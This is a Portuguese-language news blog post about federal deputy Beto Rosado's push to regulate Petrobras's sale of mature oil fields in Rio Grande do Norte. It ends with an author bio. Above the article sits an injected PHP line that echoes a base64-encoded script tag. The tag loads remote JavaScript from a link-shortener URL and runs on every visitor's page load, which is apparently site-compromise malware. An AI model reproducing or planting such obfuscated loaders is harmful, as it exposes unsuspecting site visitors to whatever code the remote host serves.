$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Deputado Beto Rosado quer aprovar regras para venda dos campos maduros

Deputado Beto Rosado quer aprovar regras para venda dos campos maduros
04 Abr 2016

Do jornal De Fato:

O deputado federal Beto Rosado (PP) vai aproveitar a Comissão Especial que está analisando o Projeto de Lei Nº 4567/2016, na Câmara Federal, para apresentar um regramento à venda dos poços maduros de Petróleo anunciada recentemente pela Petrobras. Para ele, a apreciação das regras na comissão é viável porque o projeto analisado altera a Lei 12.351/2010, marco regulatório da exploração e produção do petróleo no Brasil.

Recentemente aprovado pelo Senado, o projeto apreciado pela Comissão Especial da Câmara faculta à Petrobras o direito de preferência para atuar como operadora e possuir participação mínima de 30% nos consórcios formados para exploração dos blocos de petróleo na camada Pré-Sal. Favorável à possibilidade de permitir que a estatal escolha os campos em que deseja investir, Beto Rosado vai trabalhar para que a comissão também regulamente a atuação da companhia na venda dos campos maduros.

O deputado destaca que a abertura da exploração desses campos para as pequenas empresas é a forma da Petrobras compensar a retirada dos investimentos que promoveu nos últimos anos, causando a demissão de sete mil terceirizados e o enfraquecimento da economia do Rio Grande do Norte. Somente para 2016, estão previstas outras cinco mil demissões com o desligamento de três máquinas de perfuração.

Beto Rosado também acredita que a mudança no perfil de quem opera os campos maduros vai promover uma revolução na economia dos estados onde estão localizados, a partir do surgimento de uma indústria local de fabricação e manutenção de maquinário para as estações produtoras. Segundo ele, a geração de emprego não depende de quem opera o campo, mas do nível de investimento que se faz no negócio.

“A mudança no perfil de quem opera esses campos vai promover uma verdadeira revolução na economia potiguar, a partir do surgimento de uma indústria local do petróleo. Diferentemente do que ocorre com a Petrobras, é mais viável para as pequenas empresas comprarem seus equipamentos na região. Com esse novo modelo, as cidades do entorno das estações produtoras poderão experimentar um crescimento econômico superior ao dos tempos áureos da Petrobras. É o que a gente espera!”, continuou.

O deputado recebeu números da Associação Brasileira dos Produtores Independentes de Petróleo (ABPIP), que revelam o potencial de produção das pequenas empresas na comparação com a Petrobras. “Se em julho de 2015 os campos marginais potiguares fossem operados por empresas independentes, a projeção da produção era de 91 mil barris contra os 49 mil produzidos pela Petrobras. Isso representaria R$1,2 bilhões em royalties, sendo R$ 590 milhões somente para os municípios potiguares. Além disso, geraria 67,8 mil postos de trabalho”, concluiu.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *